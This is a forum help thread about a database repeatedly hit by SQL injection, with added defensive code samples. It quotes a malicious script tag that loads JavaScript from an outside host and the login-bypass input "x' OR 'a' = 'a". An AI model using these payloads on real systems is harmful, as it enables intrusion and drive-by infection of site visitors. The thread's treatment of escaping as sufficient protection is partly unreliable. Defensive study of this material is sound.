
Solved

SQL Injection

Posted on 2010-01-04
Medium Priority
462 Views
Last Modified: 2012-05-08
I am having a problem with my database: somehow someone is altering the data in my database. I talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table, adding some junk code, like:

so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'

Have you seen this before? Sometimes it's code from Google Analytics, etc. It is driving me crazy, not to mention a security risk. How can I track down when and who is doing this, and how can I prevent this from happening again?

This is a web application with limited users; everything (web forms, etc.) is behind a username/password protected area. Nothing is open to the public. I am using MS SQL 2000.

Any pointers are appreciated; this is a big concern for me at this moment, and I am willing to try pretty much everything that could help. But if there is a way to get the person doing this, I am willing to set up a 'trap' to get his IP or whatever.

Aleks
Question by:Aleks
21 Comments
 
LVL 5

Accepted Solution

by:
sureshchsahu earned 184 total points
ID: 26177837
The article below gives you a clear picture of how to prevent SQL injection:

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx

Author Comment

by:Aleks
ID: 26177954
OK, so if we talk about not allowing certain characters to be input into the system, the apostrophe ' would be at the top of the list, because the queries that are run require such a character. Correct?
Any other character that would be a big no-no?

LVL 25

Assisted Solution

by:madunix
madunix earned 364 total points
ID: 26178796
FYI, SQL injection is the top-rated web application attack these days. There is a lot of insecure code on the net, and there are also several ways to protect an ASP.NET application from SQL injection attacks. SQL injection can occur when an application uses input to construct dynamic SQL statements or when it uses stored procedures to connect to the database. Methods of SQL injection exploitation are classified according to the DBMS type and exploitation conditions: the vulnerable request can be an INSERT, UPDATE or DELETE; it is possible to inject SQL code into any part of the SQL request; blind SQL injection; features of the SQL implementations used in various DBMSs. Successful SQL injection attacks enable attackers to execute commands in an application's database and also take over the server. Check Google for more on how to protect against SQL injection.
Regarding the Microsoft issue, check http://msdn.microsoft.com/en-us/library/ms998271.aspx
Search http://www.sans.org/ for "sql injection"
WASC: http://projects.webappsec.org/SQL-Injection
OWASP: http://www.owasp.org/index.php/SQL_Injection

madunix

LVL 12

Assisted Solution

by:R_Harrison
R_Harrison earned 364 total points
ID: 26178878
Also check out the article below (shameless self-promotion); however, XSS is now far more popular than SQL injection, and the attack you have received uses SQL injection to perform an XSS-type attack.

http://www.experts-exchange.com/articles/Internet/Web_Development/Preventing-Cross-Site-Scripting-XSS-1.html?sfQueryTermInfo=1+30+xss

LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26178993
> nothing is open to the public

You mean there is not even a "public" part, viewable to non-logged-in users? If so, it looks like you have an easily hacked login form.

Preventing SQL injection is simple: make sure that all apostrophes in an SQL statement are escaped before sending them to the database.

<%
' Double every apostrophe in the user input before it is concatenated into the SQL
userinput = Replace(userinput, "'", "''")
%>

Hacking a login form when there is no check for SQL injection is easy, by inserting something like "x' OR 'a' = 'a" (without the double quotes) into the password field.

It results in an SQL statement like

SELECT * FROM <users> WHERE <name>='loginname' AND password='x' OR 'a' = 'a'

Because 'a' = 'a' is true for all records, this query will return all users.

LVL 75

Assisted Solution

by:Anthony Perkins
Anthony Perkins earned 184 total points
ID: 26180306
>>nothing is open to the public. I am using MS SQL 2000. <<
So MS SQL Server is behind a good firewall?


Author Comment

by:Aleks
ID: 26180716
So, for them to do this, do they need to type ' (quotes) in the password field?

If I don't allow such a character in ANY field in my entire system, would this prevent future injections?

LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26180853
Not allowing the apostrophe has some disadvantages, because it is a character that has its use.
Better to escape the apostrophe than to disallow it (in terms of code, that makes no difference).

Author Comment

by:Aleks
ID: 26180962
What do you mean by 'escape'?

LVL 12

Assisted Solution

by:R_Harrison
R_Harrison earned 364 total points
ID: 26181024
Basically, replace a single apostrophe with two apostrophes...

e.g. Replace(username, "'", "''")

so your SQL line might look something like...

sql = "SELECT * FROM mytable WHERE Username='" & Replace(Request("Username"), "'", "''") & "'"

Author Comment

by:Aleks
ID: 26181141
OK, let me get this straight.
1. I am being attacked by someone entering code in the fields where, for example, the username or password should be?
2. If I don't allow the apostrophe, or replace it, in either field, they should no longer be able to enter the code to attack me. Correct?

LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26181204
1. It is not certain how you are being attacked, but it is possible that it happens this way.
2. SQL injection can be prevented in a number of ways. The most used are parameterized queries, stored procedures or escaping (indeed, replacing every single apostrophe in user input with two apostrophes). Disallowing apostrophes as user input is not a widely used method.
0
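An added example (not code from the thread) that follows the escaping sybe and R_Harrison describe above: it builds the login statement with and without the apostrophe doubling, then checks whether the input changed the statement's structure or only filled in a value. The table and column names are assumed; the payload is the one sybe quotes.

```javascript
// Escape apostrophes by doubling them (the Replace(input, "'", "''") rule).
function escapeApostrophes(value) {
  return String(value).replace(/'/g, "''");
}

// Vulnerable: user input is concatenated straight into the statement.
function buildLoginQueryUnsafe(username, password) {
  return "SELECT * FROM users WHERE name = '" + username +
         "' AND password = '" + password + "'";
}

// Hardened: every apostrophe is doubled first, so the input can never close
// the string literal it was placed in.
function buildLoginQueryEscaped(username, password) {
  return "SELECT * FROM users WHERE name = '" + escapeApostrophes(username) +
         "' AND password = '" + escapeApostrophes(password) + "'";
}

// Split a statement into the text outside string literals (each literal
// replaced by ?) and the literal contents, reading '' as an escaped
// apostrophe, which is how T-SQL reads it.
function splitLiterals(sql) {
  var outside = [], literals = [], current = "", inLiteral = false;
  for (var i = 0; i < sql.length; i++) {
    var ch = sql[i];
    if (!inLiteral) {
      if (ch === "'") { outside.push(current); current = ""; inLiteral = true; }
      else current += ch;
    } else if (ch === "'" && sql[i + 1] === "'") {
      current += "'"; i++;                       // doubled apostrophe
    } else if (ch === "'") {
      literals.push(current); current = ""; inLiteral = false;
    } else current += ch;
  }
  outside.push(current);
  return { shape: outside.join("?"), literals: literals, unterminated: inLiteral };
}

// The statement is intact when the text outside the literals is still exactly
// the template the developer wrote; the input then only supplied values.
var TEMPLATE_SHAPE = "SELECT * FROM users WHERE name = ? AND password = ?";
function keepsTemplateShape(sql) {
  var parts = splitLiterals(sql);
  return !parts.unterminated && parts.shape === TEMPLATE_SHAPE;
}

var PAYLOAD = "x' OR 'a' = 'a";   // the login-bypass input quoted by sybe
console.log(splitLiterals(buildLoginQueryUnsafe("loginname", PAYLOAD)).shape);
console.log(splitLiterals(buildLoginQueryEscaped("loginname", PAYLOAD)).shape);
```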
 
LVL 32

Assisted Solution

by:Daniel Wilson
Daniel Wilson earned 180 total points
ID: 26181618
>> Disallowing apostrophes as user input is not a widely used method.

Right.  Mr. O'Brian strongly disapproves of such an approach :)

I highly encourage parameterized queries.  Others like escaping ... and some say to do both.

Author Comment

by:Aleks
ID: 26183680
This is the query for my login page, which is the only form outside of the password-protected area.

<%
// Username posted by the form; "%" is the default when the field is absent or empty.
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtusername")) != "undefined" && 
    String(Request.Form("txtusername")) != "") {
  EmployeeLogin__usxusername = String(Request.Form("txtusername"));
}
%>
<%
// Password posted by the form, same default.
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtpassword")) != "undefined" && 
    String(Request.Form("txtpassword")) != "") {
  EmployeeLogin__usxpassword = String(Request.Form("txtpassword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB.Recordset");
EmployeeLogin.ActiveConnection = MM_AAA_STRING;
// Every apostrophe in both inputs is doubled (.replace(/'/g, "''")) before
// the values are concatenated into the statement.
EmployeeLogin.Source = "select * from dbo.vulogdtls   WHERE Loginid = '"+ EmployeeLogin__usxusername.replace(/'/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword.replace(/'/g, "''") + "'  AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocation = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>

Would that query have any problem and be potentially unsafe? Or is it OK?

I can't seem to find anything that is causing data to be input into my database; this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make? I know reading articles helps, but it won't be something that will immediately and possibly stop the attacks. For example, "change your IP" would be a good recommendation.
I heard that from someone; do you think this would help?
Are there other specific recommendations you could offer to help prevent attacks?

How about if it's not from the outside but a file or script already on the server; is this a possibility? Or content in the database that resides there and adds the data... is this another possibility?

A

Author Comment

by:Aleks
ID: 26184198
Also, is there a possibility this is not an SQL injection and instead some malicious script already residing on the server? If this is the case, what would be the best course of action?
Or is there a chance the script is inside the database?

LVL 25

Assisted Solution

by:madunix
madunix earned 364 total points
ID: 26184665
My recommendation:
- Basically, make sure your web server is up to date with the latest security fixes/patches.
- Make sure you filter every user input and output with proper encoding like UTF-8.
Read the full testing guide: https://www.owasp.org/images/8/89/OWASP_Testing_Guide_V3.pdf
- Try to implement a web application scanner; check this link: http://trac.ush.it/ush/wiki/SecurityTools
- I use, e.g., Watchfire (now IBM AppScan) tools, http://www-01.ibm.com/software/rational/offerings/websecurity/, to scan all my web applications.

Author Comment

by:Aleks
ID: 26186160
Thank you, this is very useful. I will look into these tools.

Aleks

Author Comment

by:Aleks
ID: 26195931
I am sorry it's taken long for me to respond, but I have been busy learning and implementing the SQL fixes.
The thing is, last night I stopped my website in IIS: no web access. I cleaned up my database squeaky clean... midnight... went to sleep. Woke up and checked my database... all injected, same code all over different tables (same tables) and mostly in 'text' fields.
So... how could someone inject information into my database while the website is down? My understanding is that they do it through the web pages by entering code and submitting the form to run it; if there is no form, how in the world did my database get this code?

I checked for viruses and adware/malware... nothing on the server. It is SQL 2000 with Service Pack 4 and all patched up to the neck... don't know what else to do.

My DB person told me to run Profiler on the SQL Server so we can see what happens overnight. Any other ideas? It would sound like a worm that is in the database, but then again I know nothing about these things; I am losing my faith, and my whole business depends on this database :(

Author Comment

by:Aleks
ID: 26195937
BTW, I already changed all server passwords, database passwords, ODBC passwords; I assigned a new IP, a new domain name... and still got the code inserted into my database, all while the website that connects to the database was down.
0
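An added example (not from the thread) for the cleanup the asker describes in the two posts above: it scans exported rows for the injected <script src=...></script> value, reports the host each one loads from, and returns the field with the tag removed, so re-infection of the same tables can be spotted and undone without reading every record by hand. The rows are constructed sample data; the hostname is the one quoted in the question.

```javascript
// One injected <script src=...></script> element, src quoted or not.
var INJECTED_SCRIPT = /<script\s+src=["']?([^"'\s>]+)["']?\s*>\s*<\/script>/gi;

// Return the host of every injected script found in one field value.
function findInjectedScripts(value) {
  var hosts = [], m, s = String(value);
  INJECTED_SCRIPT.lastIndex = 0;
  while ((m = INJECTED_SCRIPT.exec(s)) !== null) {
    hosts.push(m[1].replace(/^https?:\/\//i, "").split("/")[0].toLowerCase());
  }
  return hosts;
}

// Return the field value with the injected element(s) removed.
function stripInjectedScripts(value) {
  return String(value).replace(INJECTED_SCRIPT, "");
}

// Scan rows ({table, id, <column>: value, ...}) over the given text columns
// and report each tainted field with its script hosts and cleaned value.
function scanRows(rows, textColumns) {
  var findings = [];
  for (var r = 0; r < rows.length; r++) {
    for (var c = 0; c < textColumns.length; c++) {
      var col = textColumns[c], row = rows[r];
      if (!(col in row)) continue;
      var hosts = findInjectedScripts(row[col]);
      if (hosts.length > 0) {
        findings.push({ table: row.table, id: row.id, column: col,
                        hosts: hosts, cleaned: stripInjectedScripts(row[col]) });
      }
    }
  }
  return findings;
}

// Constructed sample rows (not the asker's data); the host is the one the
// question quotes.
var SAMPLE_ROWS = [
  { table: "employees", id: 1, name: "aleks<script src=http://www.bnrupdate.mobi/b.js></script>", notes: "ok" },
  { table: "employees", id: 2, name: "maria", notes: "<script src=\"http://www.bnrupdate.mobi/b.js\"></script>" },
  { table: "employees", id: 3, name: "O'Brian", notes: "" }
];
```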
 
LVL 25

Assisted Solution

by:kevp75
kevp75 earned 180 total points
ID: 26273207
Better still would be to use parameterized queries with the ADO Command object.

Force all the data types before they get to your query.

Also, start cleaning your input... I suggest some regular expressions to validate everything.

LVL 75

Expert Comment

by:Anthony Perkins
ID: 26275853
>>better still would be to use parameterized queries <<
Very good advice.  :)
0
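As an added example (not kevp75's or the asker's code), the asker's login lookup rewritten the way kevp75 suggests: an ADODB.Command with parameters instead of escaped strings concatenated into the SQL text. The view and column names are taken from the asker's code; the parameter sizes and the stand-in command object used to run the builder outside IIS are assumptions.

```javascript
// ADO constants (values from the ADO type library).
var adCmdText = 1;
var adParamInput = 1;
var adVarChar = 200;

// Build the login lookup as a parameterized command. `command` is an
// ADODB.Command from Server.CreateObject("ADODB.Command") inside ASP; it is
// passed in so the builder can also be exercised with a stand-in outside IIS.
function buildLoginCommand(command, connection, username, password) {
  command.ActiveConnection = connection;
  command.CommandType = adCmdText;
  // The SQL text is fixed. The provider binds the values to the ? markers,
  // so they never become part of the statement's syntax and need no escaping.
  command.CommandText =
    "SELECT * FROM dbo.vulogdtls WHERE Loginid = ? AND Password = ? " +
    "AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
  // Parameter order must match the ? markers. Size 50 is an assumed column
  // width; use the declared widths of Loginid and Password.
  command.Parameters.Append(command.CreateParameter(
    "Loginid", adVarChar, adParamInput, 50, String(username)));
  command.Parameters.Append(command.CreateParameter(
    "Password", adVarChar, adParamInput, 50, String(password)));
  return command;
}

// In the ASP page the lookup then runs as:
//   var cmd = buildLoginCommand(Server.CreateObject("ADODB.Command"),
//                               MM_AAA_STRING, Request.Form("txtusername"),
//                               Request.Form("txtpassword"));
//   var rs = cmd.Execute();   // rs.EOF is true when no row matched

// Stand-in for ADODB.Command so the builder can run outside IIS (assumed,
// not an ADO object): it records what was set and executes nothing.
function fakeCommand() {
  var params = [];
  return {
    Parameters: {
      Append: function (p) { params.push(p); },
      Count: function () { return params.length; },
      Item: function (i) { return params[i]; }
    },
    CreateParameter: function (name, type, direction, size, value) {
      return { Name: name, Type: type, Direction: direction, Size: size, Value: value };
    }
  };
}
```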
